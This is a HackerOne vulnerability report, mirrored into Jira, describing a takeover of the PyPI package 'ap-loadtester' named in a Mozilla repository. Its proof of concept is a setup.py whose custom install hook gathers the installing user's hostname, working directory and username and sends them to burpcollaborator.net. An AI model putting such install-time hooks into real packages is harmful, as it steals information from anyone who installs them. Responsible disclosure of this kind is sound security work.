code injection through pip

[data-sync-user]

HackerOne Report: https://hackerone.com/reports/2097694 Report Date: 2023-08-05 17:06:15 UTC Reporter: anupamas01 Weakness: Code Injection

Initial Report: {panel}

Summary:

hello team, I found a pip package by which I can run malicious commands.

Steps To Reproduce:

[add details for how we can reproduce the issue]

1. go to https://github.com/mozilla-services/autopush-loadtester ( as it is highly been used i have not uploaded a higher version which may affect the production)
2. you can see $ pip install ap-loadtester, you can see I have taken it over https://pypi.org/project/ap-loadtester/ (in Maintainers)\ when you install it, it will install my pip package

POC

https://pypi.org/project/ap-loadtester/

( right now I am not uploading any code , if program allows i will upload )

from setuptools.command.install import install
import requests
import socket
import getpass
import os
class CustomInstall(install):
    def run(self):
        install.run(self)
        hostname=socket.gethostname()
        cwd = os.getcwd()
        username = getpass.getuser()
        ploads = {'hostname':hostname,'cwd':cwd,'username':username}
        requests.get("[https://burpcollaborator.net",params](https://burpcollaborator.net",params)
 = ploads) #replace burpcollaborator.net with Interactsh or pipedream
setup(name=ap-loadtester, #package name
      version='1.0.0',
      description='test',
      author='test',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

POC

https://pypi.org/project/ap-loadtester/

Impact

code injection through the pip package

thanks AnupamAs01

{panel}



┆Issue is synchronized with this [Jira Bug](https://mozilla-hub.atlassian.net/browse/SYNC-3860)
┆Attachments: <a href="https://mozilla-hub.atlassian.net/rest/api/2/attachment/content/40617">[F2576644] image.png</a>